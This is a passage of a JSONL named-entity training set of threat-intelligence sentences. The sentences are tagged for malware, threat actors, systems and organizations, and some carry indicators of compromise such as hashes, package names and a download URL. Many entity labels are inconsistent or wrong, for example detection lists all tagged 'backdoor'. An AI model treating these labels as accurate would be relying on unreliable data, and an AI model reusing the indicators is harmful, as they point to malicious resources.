Win32.Trojan.WisdomEyes.16070401.9500.9958 Trojan-Downloader.Win32.Firu.bp Trojan.Packed.418 BehavesLike.Win32.Dropper.mc Trojan-Downloader.Win32.Firu.bp W32/Trojan.BNRM-7642 TrojanDownloader.Firu.t Trojan:Win32/Bohmini.A Trojan-Downloader.Win32.Firu.bp Trojan/Win32.Xema.C57004 TrojanDownloader.Firu Trj/Downloader.VMH Win32.Trojan-downloader.Firu.Tcmb Win32/Trojan.Downloader.d1e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": 
"cyner2_train_002915", "source": "cyner2_train"}} {"text": "Recently, we spotted a new attack where PowerShell was abused to deliver a FAREIT variant.", "spans": {"SYSTEM: PowerShell": [[40, 50]], "VULNERABILITY: abused": [[55, 61]], "MALWARE: FAREIT variant.": [[75, 90]]}, "info": {"id": "cyner2_train_002916", "source": "cyner2_train"}} {"text": "The newly discovered samples show new capabilities not previously documented.", "spans": {}, "info": {"id": "cyner2_train_002918", "source": "cyner2_train"}} {"text": "What is most interesting about this group's more recent activity however, is their focus on users of encryption tools, peaking this summer.", "spans": {"THREAT_ACTOR: group's": [[36, 43]], "MALWARE: encryption tools,": [[101, 118]]}, "info": {"id": "cyner2_train_002921", "source": "cyner2_train"}} {"text": "Once the malware is installed on the victim's device, it opens a back door, collects a list of system-specific information, and sends it to the command and control C&C server to register the device and then get a unique identifier for the infected device.", "spans": {"MALWARE: malware": [[9, 16]], "SYSTEM: victim's device,": [[37, 53]], "MALWARE: back door,": [[65, 75]], "SYSTEM: the device": [[187, 197]], "SYSTEM: the infected device.": [[235, 255]]}, "info": {"id": "cyner2_train_002923", "source": "cyner2_train"}} {"text": "We believe the use of the Retadup malware family is limited to a very small set of threat actors.", "spans": {"MALWARE: Retadup malware family": [[26, 48]], "THREAT_ACTOR: threat actors.": [[83, 97]]}, "info": {"id": "cyner2_train_002924", "source": "cyner2_train"}} {"text": "On May 30th our honeypots captured the first attack to make use of this particular vulnerability, but the payload in this exploit had nothing in common with the Trojan-Crypt that was EternalBlue and WannaCry.", "spans": {"SYSTEM: honeypots": [[16, 25]], "VULNERABILITY: vulnerability,": [[83, 97]], "MALWARE: payload": [[106, 113]], "MALWARE: exploit": [[122, 
129]], "MALWARE: Trojan-Crypt": [[161, 173]], "MALWARE: EternalBlue": [[183, 194]], "MALWARE: WannaCry.": [[199, 208]]}, "info": {"id": "cyner2_train_002925", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.Rogue.bjbo W32/Trojan.AMVM-7843 TR/Rogue.7932483 Trojan.Graftor.DBF88 Backdoor/Win32.Etso.R61020 Trojan.Win32.Webprefix Win32/Trojan.Multi.daf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002928", "source": "cyner2_train"}} {"text": "The Carbanak team does not just blindly compromise large numbers of computers and try to milk the cow' as other actors do, instead they act like a mature APT-group.", "spans": {"THREAT_ACTOR: The Carbanak team": [[0, 17]], "SYSTEM: computers": [[68, 77]], "THREAT_ACTOR: actors": [[112, 118]], "THREAT_ACTOR: APT-group.": [[154, 164]]}, "info": {"id": "cyner2_train_002929", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9831 Bloodhound.Gampass.E Trojan.Win32.Patched.ox Trojan.Win32.PatchedDll.C BehavesLike.Win32.BadFile.cm Virus.Win32.Crypted Trojan/PSW.OnLineGames.ckdm Trojan/Win32.Patched.ox PWS:Win32/Cuepilini.A Trojan.Win32.Patched.ox Trojan.Win32.Patched.b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002930", "source": "cyner2_train"}} {"text": "Based on VirusTotal uploads, malicious documents content, and known victims – other targeted organizations are located in Turkey, Qatar, Kuwait, United Arab Emirates, Saudi Arabia, and Lebanon.", "spans": {"ORGANIZATION: VirusTotal": [[9, 19]], "ORGANIZATION: victims": [[68, 75]], "ORGANIZATION: organizations": [[93, 106]]}, "info": {"id": "cyner2_train_002931", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Jorik.Crix!O Win32.Trojan.WisdomEyes.16070401.9500.9992 Trojan.Win32.Dwn.sbard Trojan.Win32.A.Inject.129544 Trojan.DownLoader5.50729 Win32.Malware Trojan/Lebag.auv TrojanDownloader:Win32/Beshades.A 
Trojan/Win32.Inject.R29920 BScope.Malware-Cryptor.4112 Trj/CI.A Trojan.DL.Injecter!F6PQPalmepA W32/Injecter.AA!tr.dldr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002933", "source": "cyner2_train"}} {"text": "xDedic is a trading platform where cybercriminals can purchase any of over 70,000 hacked servers from all around the internet.", "spans": {"THREAT_ACTOR: xDedic": [[0, 6]], "THREAT_ACTOR: trading platform": [[12, 28]], "THREAT_ACTOR: cybercriminals": [[35, 49]], "SYSTEM: hacked servers": [[82, 96]]}, "info": {"id": "cyner2_train_002934", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9889 Trojan.Sniff BehavesLike.Win32.BadFile.mc PWS:Win32/Finsgra.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002935", "source": "cyner2_train"}} {"text": "Unit 42 does not have detailed targeting information for all known Bookworm samples, but we are aware of attempted attacks on at least two branches of government in Thailand.", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "MALWARE: Bookworm": [[67, 75]], "ORGANIZATION: government": [[151, 161]]}, "info": {"id": "cyner2_train_002936", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Elitespyz.A Backdoor/W32.EliteSpyz.1687552 Backdoor.Elitespyz Backdoor.Elitespyz.A Backdoor.Elitespyz.A W32/Risk.FRAF-2715 Backdoor.Trojan BKDR_ELITESPYZ.A Backdoor.Elitespyz.A Backdoor.Win32.EliteSpyz.4 Backdoor.Elitespyz.A Trojan.Win32.EliteSpyz.dgpj Backdoor.Win32.EliteSpyz.1687552 Backdoor.W32.EliteSpyz.4!c Backdoor.Elitespyz.A Backdoor.Win32.EliteSpyz.04 Backdoor.Elitespyz.A BackDoor.EliteSpyz.4 Backdoor.EliteSpyz.Win32.1 BKDR_ELITESPYZ.A Trojan.Win32.Elitespyz Backdoor/EliteSpyz.4 W32.Hack.Tool BDS/EliteSpyz.4 Trojan[Backdoor]/Win32.EliteSpyz Backdoor.Win32.EliteSpyz.4 Backdoor.EliteSpyz Win32/EliteSpyz.04 Win32.Backdoor.Elitespyz.Wrgi Backdoor.EliteSpyz!8lwaYNdDuBo W32/EliteSpy.A!tr.bdr 
Win32/Backdoor.Spy.754", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002938", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Uncrre TR/RedCap.wfhca Trojan.Win32.Z.Uncrre.3584 Trojan:Win32/Uncrre.A Trojan.Win32.Uncrre Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002939", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/W32.Ruskill.143360 Backdoor.Win32.Ruskill!O Worm.Ainslot.A Backdoor.Ruskill.Win32.42 Backdoor.W32.Ruskill.fi!c Backdoor/Ruskill.fi TROJ_DROPR.SMIO Worm.Win32.Ngrbot.dfk Trojan.Win32.StartPage.cjvsv Trojan.Win32.Menti.98304 TrojWare.Win32.Injector.GWW BackDoor.IRC.Bot.892 TROJ_DROPR.SMIO Trojan.Win32.Buzus Backdoor/Ruskill.da W32/Injector.HCR!tr Worm/Win32.Ngrbot Worm.Win32.Ngrbot.dfk Worm/Win32.AutoRun.R6237 Worm.Ngrbot Win32.Trojan.Inject.Auto Backdoor.Ruskill!/ah4op3yVOE", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002940", "source": "cyner2_train"}} {"text": "Since approximately September 2022, cyber criminals have compromised U.S. 
and international organizations with a Royal ransomware variant.", "spans": {"THREAT_ACTOR: cyber criminals": [[36, 51]], "ORGANIZATION: U.S.": [[69, 73]], "ORGANIZATION: international organizations": [[78, 105]], "MALWARE: Royal ransomware": [[113, 129]]}, "info": {"id": "cyner2_train_002941", "source": "cyner2_train"}} {"text": "A backdoor also known as: W97M.Dropper.H W97M.Dropper.CB W97M/Dropper.m Troj.Downloader.Msword!c W97M/Dropexe.A W97M.Dropper.H W97M.Dropper.H W97M.Dropper.H W97M.Dropper.H W97M/Dropper.m W97M/Dropexe.A HEUR/Macro.Dropper HEUR.VBA.Trojan.d W97M.Dropper.H macro.ole.encodedownload.f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002943", "source": "cyner2_train"}} {"text": "It has outlived several competitors including Zeus, and SpyEye.", "spans": {"MALWARE: Zeus,": [[46, 51]], "MALWARE: SpyEye.": [[56, 63]]}, "info": {"id": "cyner2_train_002945", "source": "cyner2_train"}} {"text": "Dyre employed the spambot Gophe to send thousands of randomized documents hashes and file names per spam campaign", "spans": {"MALWARE: Dyre": [[0, 4]], "MALWARE: spambot Gophe": [[18, 31]], "THREAT_ACTOR: spam campaign": [[100, 113]]}, "info": {"id": "cyner2_train_002946", "source": "cyner2_train"}} {"text": "Throughout 2015 and 2016, Android banking Trojans were primarily distributed outside the Google Play Store by using SMSishing, phishing e-mails and rogue websites, often dropping APKs related to Adobe Flash Player.", "spans": {"MALWARE: Android banking Trojans": [[26, 49]], "SYSTEM: the Google Play Store": [[85, 106]], "SYSTEM: APKs": [[179, 183]], "SYSTEM: Adobe Flash Player.": [[195, 214]]}, "info": {"id": "cyner2_train_002947", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9935 TrojanDownloader:Win32/Leodon.D", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002948", "source": "cyner2_train"}} {"text": "On June 14th, 2017, a new variant of ZXShell 
appears to have been uploaded from the Marmara region of Turkey.", "spans": {"MALWARE: variant": [[26, 33]], "MALWARE: ZXShell": [[37, 44]]}, "info": {"id": "cyner2_train_002949", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Razy.D3E075 Trojan.MSIL.Crypt.gbqy BehavesLike.Win32.Trojan.gc Trojan.MSIL.Crypt TR/Kryptik.psxte Backdoor:Win32/Dodiw.A Trojan.MSIL.Crypt.gbqy Trj/GdSda.A MSIL/Kryptik.MQQ!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002951", "source": "cyner2_train"}} {"text": "Tick also uses a range of hacktools to map the victim's network and attempt to escalate privileges further.", "spans": {"THREAT_ACTOR: Tick": [[0, 4]], "MALWARE: hacktools": [[26, 35]]}, "info": {"id": "cyner2_train_002952", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9993 Trojan.Win32.KrServ.rq Trojan.Win32.JackServn.exlgil Trojan.Win32.Z.Jackservn.306688 Trojan.DownLoader26.11701 Trojan.Win64.Jackservn TR/JackServn.sphdt Trojan.Downloader.184 Trojan.Win32.KrServ.rq Trj/CI.A W32/JackServn.K!tr Win32/Trojan.Downloader.369", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002953", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Clodeb4.Trojan.8496 Trojan/W32.Scar.350208.E W32/Autorun.worm.bcd Worm.Autorun Trojan/Scar.dyfr W32/MalwareS.BDRB W32.Huanot Virut.A[gs] Win32/Huanot.A WORM_HUANOT.SMIA Trojan.Scar-846 Trojan.Win32.Scar.bvisc Trojan.Win32.A.Scar.350208 Trojan.Copyself.101 TR/Scar.ccwl WORM_HUANOT.SMIA W32/Autorun.worm.bcd Trojan/Scar.pkp Worm:Win32/Huanot.A Trojan/Win32.Scar W32/Risk.JTAZ-7050 Virus.Win32.Heur.l W32/Autorun.JXD PE:Malware.FakeFolder@CV!1.6AA9 Worm.Win32.Huanot", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002954", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Virut.Cur1 W32/Manex.worm Trojan.Zusy.D62E9 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Dropper.BBXI 
Win.Trojan.Cosmu-1044 Trojan.Win32.Scar.ojal Trojan.Win32.AutoRun.cgsnz Worm.Win32.A.AutoRun.310273 W32.W.AutoRun.cikl!c Win32.HLLW.Autoruner.27598 Trojan.Cosmu.Win32.3832 W32/Manex.worm W32/Risk.SOOH-5229 Trojan/Cosmu.dxm Trojan/Win32.Cosmu Worm:Win32/Vestgo.A Trojan.Win32.Scar.ojal HEUR/Fakon.mwf Worm.AutoRun Win32.Trojan.Scar.Dxwy Trojan.Scar!/4mh5woJZa8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002956", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.CDB.C8b2 TrojanBanker.Banker.awoc Trojan.Win32.Banker.bdicvp W32/MalwareF.FQTI Infostealer.Bancos Trojan-Banker.Win32.Banker.awoc Trojan.PWS.Banker!/1rqiSjn+V4 TrojWare.Win32.Spy.Banker.awoc Trojan-Banker.Win32.Banker TR/Banker.Banker.awoc Trojan/Banker.Banker.kbj Trojan:Win32/Sawmabs.A W32/Risk.BGBM-2797 Trojan-GameThief.Magania Trj/Thed.E Win32/Spy.Delf.NZK Trojan-Banker.Win32.Banker W32/Banker.AWOC!tr PSW.Banker5.BFQR Trojan.Win32.Delf.amo", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002959", "source": "cyner2_train"}} {"text": "The attack against Anthem resulted in the largest known healthcare data breach to date, with 80 million patient records exposed.", "spans": {"ORGANIZATION: Anthem": [[19, 25]]}, "info": {"id": "cyner2_train_002961", "source": "cyner2_train"}} {"text": "ITG08 also has gained initial access by targeting specific employees with LinkedIn and spear-phishing emails to deliver the More_eggs backdoor.", "spans": {"THREAT_ACTOR: ITG08": [[0, 5]], "ORGANIZATION: specific employees with LinkedIn": [[50, 82]], "MALWARE: the More_eggs backdoor.": [[120, 143]]}, "info": {"id": "cyner2_train_002962", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Constructor.Xploitzomshc.A Constructor/W32.XploitZomShc.253952 Hacktool.Zomshc Trojan/Constructor.XploitZomShc.a Trojan.Constructor.Xploitzomshc.A W32/TrojanX.GSC Construction.Kit Trojan.Constructor.Xploitzomshc.A Constructor.Win32.XploitZomShc.a 
Trojan.Constructor.Xploitzomshc.A Riskware.Win32.XploitZomShc.hrxx Constructor.XploitZomShc.253952 Constructor.W32.XploitZomShc.a!c Win32.Trojan.Xploitzomshc.Wqwm Trojan.Constructor.Xploitzomshc.A Trojan.Constructor.Xploitzomshc.A VirusConstructor.Shc Tool.XploitZomShc.Win32.1 BehavesLike.Win32.Dropper.dc Trojan.Constructor.Xploitzomshc W32/Trojan.KXHA-5736 Constructor.XploitZomShc.b W32.Hack.Tool KIT/XploitZomShc.A HackTool[Constructor]/Win32.XploitZomShc VTool.XploitZomShc.a.kcloud Constructor.Win32.XploitZomShc.a Trojan.Constructor.Xploitzomshc.A Constructor.XploitZomShc W32/XploitZomShc.A!tr Win32/Constructor.96c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002963", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9986 Trojan-Downloader.Win32.Hover2.n TrojWare.Win32.TrojanDownloader.Small.NZK Trojan.DownLoader.45214 Trojan-Downloader.Win32.Hover2.n Win32/TrojanDownloader.Small.NZK", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002964", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanSpy.MSIL.r3 Trojan.Dropper Troj.PSW.MSIL.NetPass Trojan/Clicker.nai TrojanSpy.KeyLogger!3foOCbTDOkQ Spyware.ADH MSIL/TrojanClicker.NAI Trojan.Msil-382 Trojan-Spy.MSIL.KeyLogger.bybj Trojan.Win32.NetPass.dcndda Msil.Trojan-spy.Keylogger.Lhxb Trojan.MulDrop1.48625 Trojan/PSW.MSIL.oy W32/Dx.SUK!tr Trojan[PSW]/MSIL.NetPass Trojan.MSIL.Krypt.1 Trojan/Win32.Infostealer TrojanClicker:MSIL/Lnkhit.A MSIL.TrojanClicker Virus.MSIL Trojan.MSIL.KeyLogger.bybj Win32/Trojan.bee", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002965", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win.Trojan.Shell-426 Backdoor:Win32/Sensode.G Trj/GdSda.A Win32/Trojan.75c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002968", "source": "cyner2_train"}} {"text": "The domain was registered on March 8th , 2013 : 
Registration Service Provided By : SHANGHAI MEICHENG TECHNOLOGY INFORMATION DEVELOPMENT CO. , LTD. Domain Name : DLMDOCUMENTSEXCHANGE.COM Registration Date : 08-Mar-2013 Expiration Date : 08-Mar-2014 Status : LOCKED The domain registration data indicates the following owner : Registrant Contact Details : peng jia peng jia ( bdoufwke123010 @ gmail.com ) beijingshiahiidienquc.d beijingshi beijing,100000 CN Tel .", "spans": {"ORGANIZATION: SHANGHAI MEICHENG TECHNOLOGY INFORMATION DEVELOPMENT CO. , LTD.": [[83, 146]]}, "info": {"id": "cyner2_train_002969", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Win32.Poison.C12016", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002971", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Payreen Trojan.Ransom.TechSupportScam Trojan.Win32.Payreen.evwzbn W32/Trojan.JXJF-8565 TR/Payreen.exevx SupportScam:MSIL/Payreen.A Trojan.TechSupportScam Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002972", "source": "cyner2_train"}} {"text": "Python/Agent.F is a worm that spreads via removable media.", "spans": {"MALWARE: worm": [[20, 24]], "SYSTEM: removable media.": [[42, 58]]}, "info": {"id": "cyner2_train_002973", "source": "cyner2_train"}} {"text": "This post intends to share the findings of the FortiGuard Lion Team on BlackMoon's prevalence and its latest code updates.", "spans": {"ORGANIZATION: FortiGuard Lion Team": [[47, 67]], "MALWARE: BlackMoon's": [[71, 82]]}, "info": {"id": "cyner2_train_002974", "source": "cyner2_train"}} {"text": "The Trojan may download files from the following remote location: [http://]bit.ly/2k4[REMOVED]", "spans": {"MALWARE: Trojan": [[4, 10]]}, "info": {"id": "cyner2_train_002975", "source": "cyner2_train"}} {"text": "A backdoor also known as: Exploit/W32.CVE-2014-4114.I JS.Swabfex.QZ Exploit.CVE-2014-4114.A Troj.W32.Autoit!c Trojan.PPDropper TROJ_CVE20144114.G Trojan.Win32.Autoit.ezc 
Trojan.Win32.Autoit.efjbnz PPT.S.Exploit.1116160 TROJ_CVE20144114.G Trojan[Exploit]/OLE.CVE-2014-6352 Win32.Trojan.Autoit.Dwsw Trojan.Win32.BitcoinMiner virus.exp.20144114", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002977", "source": "cyner2_train"}} {"text": "Zygote is a daemon whose goal is to launch apps on Android, and injecting code into it allows the malware to intervene in any activity on the device.", "spans": {"MALWARE: Zygote": [[0, 6]], "SYSTEM: daemon": [[12, 18]], "SYSTEM: Android,": [[51, 59]], "MALWARE: malware": [[98, 105]], "SYSTEM: device.": [[142, 149]]}, "info": {"id": "cyner2_train_002983", "source": "cyner2_train"}} {"text": "This came on Friday 12th May when it was bundled with ransomware called WanaCrypt0r and let loose.", "spans": {"MALWARE: ransomware": [[54, 64]], "MALWARE: WanaCrypt0r": [[72, 83]]}, "info": {"id": "cyner2_train_002985", "source": "cyner2_train"}} {"text": "Proofpoint researchers conducted a historical analysis of samples related to this research and uncovered new malware variants and likely origins and methods of infection.", "spans": {"ORGANIZATION: Proofpoint researchers": [[0, 22]], "MALWARE: malware": [[109, 116]]}, "info": {"id": "cyner2_train_002988", "source": "cyner2_train"}} {"text": "Mitigations Stay protected from mobile malware by taking these precautions : Do not download apps from unfamiliar sites Only install apps from trusted sources Pay close attention to the permissions requested by apps Install a suitable mobile security app , such as SEP Mobile or Norton , to protect your device and data Keep your operating system up to date Make frequent backups of important data Indicators of Compromise ( IoCs ) Package names : anew.football.cup.world.com.worldcup com.coder.glancelove com.winkchat APK SHA2 : 166f3a863bb2b66bda9c76dccf9529d5237f6394721f46635b053870eb2fcc5a b45defca452a640b303288131eb64c485f442aae0682a3c56489d24d59439b47 
d9601735d674a9e55546fde0bffde235bc5f2546504b31799d874e8c31d5b6e9 2ce54d93510126fca83031f9521e40cd8460ae564d3d927e17bd63fb4cb20edc 67b1a1e7b505ac510322b9d4f4fc1e8a569d6d644582b588faccfeeaa4922cb7 1664cb343ee830fa94725fed143b119f7e2351307ed0ce04724b23469b9002f2 Loaded DEX SHA2 : afaf446a337bf93301b1d72855ccdd76112595f6e4369d977bea6f9721edf37e Domain/IP : goldncup [ .", "spans": {}, "info": {"id": "cyner2_train_002990", "source": "cyner2_train"}} {"text": "Within the past couple years there were several major incidents that cited the use of Windows backdoors being ported to Linux.", "spans": {"SYSTEM: Windows": [[86, 93]], "MALWARE: backdoors": [[94, 103]], "SYSTEM: Linux.": [[120, 126]]}, "info": {"id": "cyner2_train_002992", "source": "cyner2_train"}} {"text": "Malware authors can sometimes be creative in order to manipulate their human targets on the one hand and to circumvent security products, too.", "spans": {}, "info": {"id": "cyner2_train_002993", "source": "cyner2_train"}} {"text": "In regard to the attack lifecycle, development of tools occurs in the weaponization/staging phase that precedes the delivery phase, of which is typically the first opportunity we see the actors' activities as they interact directly with their target.", "spans": {}, "info": {"id": "cyner2_train_002995", "source": "cyner2_train"}} {"text": "ThreatTrack Security Labs researchers have confirmed the credential-stealing Trojan Dyre is using a new dropper — and a valid digital certificate — to carry out its dirty work over HTTPS connections.", "spans": {"ORGANIZATION: ThreatTrack Security Labs": [[0, 25]], "MALWARE: Trojan Dyre": [[77, 88]], "MALWARE: dropper": [[104, 111]]}, "info": {"id": "cyner2_train_002996", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Adclicker.HB Trojan-Dropper/W32.Dapato.114688.C Trojan-Dropper.Win32.Dapato!O Trojan.Adclicker.HB Dropper.Dapato.Win32.9811 Trojan/Dropper.Dapato.axil Trojan.Adclicker.HB TROJ_WEVARM.SM 
Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_WEVARM.SM Win.Trojan.Dapato-938 TrojanDropper.Dapato Trojan.Win32.Dapato.ctxtcy Trojan.DownLoader6.77 Trojan-Clicker.AXPC TrojanDropper.Dapato.fxa Win32.Troj.Dapato.kcloud TrojanDownloader:Win32/Obvod.K Trojan.Adclicker.HB Trojan.Adclicker.HB Dropper/Win32.Dapato.R27056 Trojan.Adclicker.HB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002997", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Damatak Trojan.Heur.JP.EEC131 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Poison.eqxekp Trojan.Chanitor.26 BehavesLike.Win32.Injector.km Backdoor:Win32/Damatak.A Backdoor.W32.Hupigon.kYZB Heur.Trojan.Hlux Trj/CI.A Win32.Trojan.Dlder.Tayr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002998", "source": "cyner2_train"}} {"text": "The email was supposedly sent by the head of a US-based terrorist monitoring group.", "spans": {"ORGANIZATION: head": [[37, 41]], "ORGANIZATION: US-based terrorist monitoring group.": [[47, 83]]}, "info": {"id": "cyner2_train_002999", "source": "cyner2_train"}} {"text": "A backdoor also known as: BDS/Iroffer.1221.5 Backdoor.Iroffer.AM W32/Iroffer.BC Trojan.Ioffer Backdoor.Win32.Iroffer.1221 Backdoor.Iroffer.1.2.2.1 W32/Iroffer.AM@bd BackDoor.Iroffer.1221 Backdoor.Win32.Iroffer.1221 W32/Iroffer.AM@bd Backdoor.Iroffer.1221.4098 Backdoor:Win32/Iroffer.1_221 Backdoor.Iroffer.1221 Win32/Iroffer.1222 Backdoor.Win32.Iroffer.1221 BackDoor.Iroffer.AD", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003001", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Downloader.LoadAdv.ABW Trojan.Downloader.LoadAdv.ABW Win32.Trojan.WisdomEyes.16070401.9500.9971 Trojan.Downloader.LoadAdv.ABW Trojan.Downloader.LoadAdv.ABW Trojan.Downloader.LoadAdv.ABW Trojan.Packed.359 Trojan:Win32/Piptea.E Email-Worm.Win32.Joleee", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003002", 
"source": "cyner2_train"}} {"text": "Pay-per-infection is an underground business model where criminals are paying other criminals to distribute their malware", "spans": {"MALWARE: Pay-per-infection": [[0, 17]], "THREAT_ACTOR: underground business": [[24, 44]], "THREAT_ACTOR: criminals": [[57, 66], [84, 93]], "MALWARE: malware": [[114, 121]]}, "info": {"id": "cyner2_train_003003", "source": "cyner2_train"}} {"text": "A number of tools and previously unknown exploits were discovered in the trove of data posted online.", "spans": {"MALWARE: tools": [[12, 17]], "MALWARE: unknown exploits": [[33, 49]]}, "info": {"id": "cyner2_train_003004", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.DesticosLTG.Trojan Worm.Delf.Win32.2144 Worm.Win32.Delf.aai Trojan.Win32.Delf.ejergb Win32.Worm.Delf.Pkqt Trojan.MulDrop6.34757 BehavesLike.Win32.Dropper.vc W32/Trojan.ZKLJ-7196 Worm.Delf.ah Trojan:Win32/Chamolyon.A Trojan.Zusy.D2E11A Worm.Win32.Delf.aai Worm.Delf!YSxowO1fm1s Trojan-Downloader.Win32.Banload Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003005", "source": "cyner2_train"}} {"text": "Name MD5 Purpose msconf.exe 55fb01048b6287eadcbd9a0f86d21adf Main module , reverse shell network.exe f673bb1d519138ced7659484c0b66c5b Sending exfiltrated data system.exe d3baa45ed342fbc5a56d974d36d5f73f Surrounding sound recording by mic update.exe 395f9f87df728134b5e3c1ca4d48e9fa Keylogging wow.exe 16311b16fd48c1c87c6476a455093e7a Screenshot capturing skype_sync2.exe 6bcc3559d7405f25ea403317353d905f Skype call recording to MP3 All modules , except skype_sync2.exe , are written in Python and packed to binary files via the Py2exe tool .", "spans": {"SYSTEM: Skype": [[404, 409]], "SYSTEM: Python": [[486, 492]], "SYSTEM: Py2exe": [[528, 534]]}, "info": {"id": "cyner2_train_003006", "source": "cyner2_train"}} {"text": "The loader ’ s anti-debugger code is based on the following three methods : The first call aims to destroy the debugger 
connection : NOTE : This call completely stops the execution of WinDbg and other debuggers The second call tries to detect the presence of a debugger : The final call tries to destroy the possibility of adding software breakpoint : Finally , if the loader is happy with all the checks done so far , based on the victim operating system ( 32 or 64-bit ) it proceeds to decrypt a set of fake bitmap resources ( stage 2 ) embedded in the executable and prepares the execution of a new layer of VM decoding .", "spans": {}, "info": {"id": "cyner2_train_003009", "source": "cyner2_train"}} {"text": "Commodity Remote Access Trojans RATs -- which are designed, productized and sold to the casual and experienced hacker alike -- put powerful remote access capabilities into the hands of criminals.", "spans": {"MALWARE: Commodity Remote Access Trojans RATs": [[0, 36]], "THREAT_ACTOR: experienced hacker": [[99, 117]], "MALWARE: remote access": [[140, 153]], "THREAT_ACTOR: criminals.": [[185, 195]]}, "info": {"id": "cyner2_train_003010", "source": "cyner2_train"}} {"text": "In advance of any official release, cybercriminals have already released their own Mario-related apps.", "spans": {"THREAT_ACTOR: cybercriminals": [[36, 50]], "MALWARE: own Mario-related apps.": [[79, 102]]}, "info": {"id": "cyner2_train_003014", "source": "cyner2_train"}} {"text": "This implant was deployed in less than 10 machines only.", "spans": {"MALWARE: implant": [[5, 12]], "SYSTEM: 10 machines": [[39, 50]]}, "info": {"id": "cyner2_train_003015", "source": "cyner2_train"}} {"text": "This campaign started on July 9, a few days after the Hacking Team announced it was hacked.", "spans": {"THREAT_ACTOR: campaign": [[5, 13]], "ORGANIZATION: Hacking Team": [[54, 66]]}, "info": {"id": "cyner2_train_003016", "source": "cyner2_train"}} {"text": "Most of the organizations attacked were vendors of industrial automation solutions and system support contractors.", "spans": {"ORGANIZATION: organizations": [[12, 25]], 
